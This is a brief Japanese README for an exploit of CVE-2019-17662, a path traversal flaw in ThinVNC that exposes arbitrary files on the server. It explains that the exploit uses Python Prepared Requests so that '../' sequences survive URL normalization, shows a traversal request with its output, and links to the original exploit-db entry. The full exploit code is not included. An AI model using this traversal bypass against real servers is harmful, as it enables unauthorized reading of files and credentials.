
CVE-2019-17662のエクスプロイトで、ThinVNCのパストラバーサル脆弱性であり、URL正規化バイパスを示してターゲットサーバー上の任意のファイルにアクセスします。
CVEコードを修正しました。
python3 requests モジュールが URL 内の ../ を正規化するため、Prepared Requests を使用しました。次に例を示します。
コード:
r = requests.get("http://123.123.123.123/../../../../../../test")
print(str(r.status_code))
結果:
GET /test HTTP/1.1
Host: 123.123.123.123
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.22.0
元のエクスプロイト:
https://www.exploit-db.com/exploits/47519